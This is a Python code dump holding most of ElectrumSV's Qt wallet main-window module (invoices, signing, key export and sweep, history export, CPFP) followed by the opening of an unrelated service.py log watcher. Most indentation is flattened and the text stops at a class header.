self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_coinsplitting_tab(self):
return CoinSplittingTab(self)
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
self.contact_list = l = ContactList(self._api, self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_string()))):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
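    # Coin selection: if the user "spent" specific coins from the coins tab
    # they are used as-is, otherwise every spendable coin in the wallet is a
    # candidate input.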
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, contact_ids: Iterable[int]):
paytos = [self.get_contact_payto(contact_id) for contact_id in contact_ids]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def _on_contacts_changed(self) -> None:
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(self.format_amount(tx_output.value) + app_state.base_unit() +
' @ ' + tx_output_to_display_text(tx_output)[0]
for tx_output in pr.get_outputs())
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires, _("Unknown"))), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip270.json")
if not fn:
return
with open(fn, 'w') as f:
                f.write(pr.to_json())
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'app': self.app,
'config': app_state.config,
'daemon': app_state.daemon,
'electrumsv': electrumsv,
'network': self.network,
'util': util,
'wallet': self.wallet,
'window': self,
})
c = commands.Commands(self.config, self.wallet, self.network,
lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=self.password_dialog,
**kwargs)
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet', 'config']:
continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
from .status_bar import StatusBar
self._status_bar = StatusBar(self)
self.set_status_bar_balance(False)
self.setStatusBar(self._status_bar)
def set_status_bar_balance(self, shown: bool) -> None:
if shown:
c, u, x = self.wallet.get_balance()
bsv_status, fiat_status = self.get_amount_and_units(c)
else:
bsv_status, fiat_status = _("Unknown"), None
self._status_bar.set_balance_status(bsv_status, fiat_status)
def update_buttons_on_seed(self):
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except Exception as e:
self.show_error(str(e))
return
except:
self.logger.exception("")
self.show_error(_('Failed to update password'))
return
msg = (_('Password was updated successfully') if new_password
else _('Password is disabled, this wallet is not protected'))
self.show_message(msg, title=_("Success"))
def toggle_search(self):
self._status_bar.search_box.setHidden(not self._status_bar.search_box.isHidden())
if not self._status_bar.search_box.isHidden():
self._status_bar.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def show_master_public_keys(self):
dialog = QDialog(self)
dialog.setWindowTitle(_("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for Electrum #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet() # pylint: disable=no-value-for-parameter
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
app_state.daemon.stop_wallet_at_path(wallet_path)
self.close()
os.unlink(wallet_path)
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except Exception as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception("")
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script_bytes().hex())
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in ElectrumSV, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin SV address.'))
return
        if not isinstance(addr, P2PKH_Address):
            self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' +
                              self.msg_sign)
            return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.run_in_thread(self.wallet.sign_message, addr, message, password,
on_success=show_signed_message)
def run_in_thread(self, func, *args, on_success=None):
def _on_done(future):
try:
result = future.result()
except Exception as exc:
self.on_exception(exc)
else:
if on_success:
on_success(result)
return self.app.run_in_thread(func, *args, on_done=_on_done)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip()).to_string()
except:
self.show_message(_('Invalid Bitcoin SV address.'))
return
message = message.toPlainText().strip()
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = PublicKey.verify_message_and_address(sig, message, address)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
def do_sign(checked=False):
# pylint: disable=no-value-for-parameter
self.do_sign(address_e, message_e, signature_e)
b.clicked.connect(do_sign)
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(partial(self.do_verify, address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
def show_decrypted_message(msg):
message_e.setText(msg.decode())
self.run_in_thread(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password,
on_success=show_decrypted_message)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = PublicKey.from_hex(pubkey_e.text())
except Exception as e:
self.logger.exception("")
self.show_warning(_('Invalid Public key'))
else:
encrypted = public_key.encrypt_message_to_base64(message)
encrypted_e.setText(encrypted)
def encrypt_message(self, public_key_str=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(630, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
pubkey_e.setText(public_key_str)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
def do_decrypt(checked=False):
# pylint: disable=no-value-for-parameter
self.do_decrypt(message_e, pubkey_e, encrypted_e)
b.clicked.connect(do_decrypt)
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
if not txt:
return None
hex_str = tx_from_str(txt)
tx = Transaction.from_hex(hex_str)
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [coin.key() for coin in my_coins]
for txin in tx.inputs:
outpoint = (txin.prev_hash, txin.prev_idx)
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
txin.value = my_coins[my_index].value
return tx
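    # For inputs that spend this wallet's own coins, tx_from_text() fills in
    # txin.value from the wallet's spendable coin list, which allows a fee to
    # be computed for imported transactions.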
def read_tx_from_qrcode(self):
data = qrscanner.scan_barcode(self.config.get_video_device())
if not data:
return
# if the user scanned a bitcoin URI
if web.is_URI(data):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
return self.tx_from_text(data)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
with open(fileName, "r") as f:
file_content = f.read()
tx_file_dict = json.loads(file_content.strip())
return self.tx_from_text(file_content)
def do_process_from_qrcode(self):
try:
tx = self.read_tx_from_qrcode()
if tx:
self.show_transaction(tx)
except Exception as reason:
self.logger.exception(reason)
self.show_critical(_("ElectrumSV was unable to read the transaction:") +
"\n" + str(reason))
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"),
_("Load transaction"))
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except Exception as reason:
self.logger.exception(reason)
self.show_critical(_("ElectrumSV was unable to read the transaction:") +
"\n" + str(reason))
def do_process_from_file(self):
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except Exception as reason:
self.logger.exception(reason)
self.show_critical(_("ElectrumSV was unable to read the transaction:") +
"\n" + str(reason))
def do_process_from_txid(self):
from electrumsv import transaction
prompt = _('Enter the transaction ID:') + '\u2001' * 30 # em quad
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), prompt)
if ok and txid:
txid = str(txid).strip()
try:
hex_str = self.network.request_and_wait('blockchain.transaction.get', [txid])
except Exception as exc:
d = UntrustedMessageDialog(
self, _("Transaction Lookup Error"),
_("The server was unable to locate the transaction you specified."),
exc)
d.exec()
return
tx = transaction.Transaction.from_hex(hex_str)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(
_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.')
)
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "\n".join([
_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.")
])
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrumsv-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr.to_string()] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(
"Please wait... %d/%d" % (len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("ElectrumSV was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
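    # CSV export writes one "address,private_key" row per key; the JSON export
    # dumps the same mapping as a single indented object.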
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("ElectrumSV was unable to import your labels.") + "\n" +
str(reason))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"),
'electrumsv_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("ElectrumSV was unable to export your labels.") + "\n" +
str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrumsv-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("ElectrumSV was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason),
title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.export_history()
lines = []
for item in history:
if is_csv:
lines.append([item['txid'], item.get('label', ''),
item['confirmations'], item['value'], item['date']])
else:
lines.append(item)
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash", "label", "confirmations",
"value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
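    # History is exported either as CSV rows (transaction_hash, label,
    # confirmations, value, timestamp) or as the raw JSON entries returned by
    # wallet.export_history().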
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText())
def enable_sweep():
sweep_button.setEnabled(bool(get_address_text()
and get_priv_keys()))
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
if not d.exec_():
return
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_priv_keys(), self.network.get_utxos)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except Exception as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except Exception as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") +
':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
#
# Preferences dialog and its signals.
#
def on_num_zeros_changed(self):
self.history_list.update()
self.history_updated_signal.emit()
self.address_list.update()
def on_fiat_ccy_changed(self):
'''Called when the user changes fiat currency in preferences.'''
b = app_state.fx and app_state.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def on_base_unit_changed(self):
edits = self.amount_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.history_list.update()
self.history_updated_signal.emit()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
for tx_dialog in self.tx_dialogs:
tx_dialog.update()
def on_fiat_history_changed(self):
self.history_list.refresh_headers()
def on_fiat_balance_changed(self):
self.address_list.refresh_headers()
self.address_list.update()
def preferences_dialog(self):
dialog = PreferencesDialog(self.wallet)
dialog.exec_()
def ok_to_close(self):
# Close our tx dialogs; return False if any cannot be closed
for tx_dialog in list(self.tx_dialogs):
if not tx_dialog.close():
return False
return True
def closeEvent(self, event):
if self.ok_to_close():
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.clean_up()
self.cleaned_up = True
event.accept()
else:
event.ignore()
def clean_up(self):
if self.network:
self.network.unregister_callback(self.on_network)
if self.tx_notify_timer:
self.tx_notify_timer.stop()
self.tx_notify_timer = None
self.network_status_task.cancel()
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError):
self.logger.exception("unable to write to config (directory removed?)")
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError):
self.logger.exception("unable to write to wallet storage (directory removed?)")
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
for keystore in self.wallet.get_keystores():
if isinstance(keystore, Hardware_KeyStore):
app_state.device_manager.unpair_xpub(keystore.xpub)
self.logger.debug(f'closing wallet {self.wallet.storage.path}')
self.app.timer.timeout.disconnect(self.timer_actions)
self.app.close_window(self)
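    # Child-pays-for-parent: the proposed fee defaults to fee_per_kb applied to
    # the combined size of parent and child, and may not exceed the value of
    # the unconfirmed output being re-spent.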
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + app_state.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit()
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + app_state.base_unit())
if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
# ============================== service.py ==============================
import os
import re
import sys
import time
import click
import psutil
import importlib
import threading
import subprocess
import anchore_engine.configuration.localconfig
from watchdog.observers import Observer
from watchdog.events import RegexMatchingEventHandler
import anchore_manager.util
import anchore_manager.util.db
import anchore_manager.util.logging
import anchore_manager.util.proc
from anchore_manager.util.proc import ExitCode, fail_exit, doexit
from anchore_manager.util.logging import log_error, logger
import anchore_engine.db.entities.common
service_map = {
"analyzer": "anchore-worker",
"simplequeue": "anchore-simplequeue",
"apiext": "anchore-api",
"catalog": "anchore-catalog",
"policy_engine": "anchore-policy-engine",
}
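# Known engine service names and the anchore-* process names they appear to
# run under; the log watcher below streams any matching anchore-*.log output
# to stdout.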
class AnchoreLogWatcher(RegexMatchingEventHandler):
    regexes = [re.compile(r".*/anchore-.*\.log$")]
files = {}
def do_close(self, event):
if event.src_path in self.files and self.files[event.src_path]["filehandle"]:
self.files[event.src_path]["filehandle"].close()
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
def on_deleted(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
self.do_close(event)
def on_modified(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
if not self.files[event.src_path]["filehandle"]:
if os.path.exists(event.src_path):
self.files[event.src_path]["filehandle"] = open(event.src_path)
if self.files[event.src_path]["filehandle"]:
            patt = re.match(r".*anchore-(.*)\.log$", event.src_path)
if patt:
logname = patt.group(1)
else:
logname = event.src_path
for line in self.files[event.src_path]["filehandle"].readlines():
sys.stdout.write("[service:" + str(logname) + "] " + line)
self.files[event.src_path]["filetell"] = self.files[event.src_path][
"filehandle"
].tell()
def on_created(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
if self.files[event.src_path]["filehandle"]:
self.do_close(event)
if os.path.exists(event.src_path):
self.files[event.src_path]["filehandle"] = open(event.src_path)
self.files[event.src_path]["filetell"] = 0
def on_moved(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
self.on_created(event)
def on_any_event(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
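# Runs a service entrypoint in its own thread; start() is invoked again by the auto-restart loop below when a service thread dies.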
class ServiceThread:
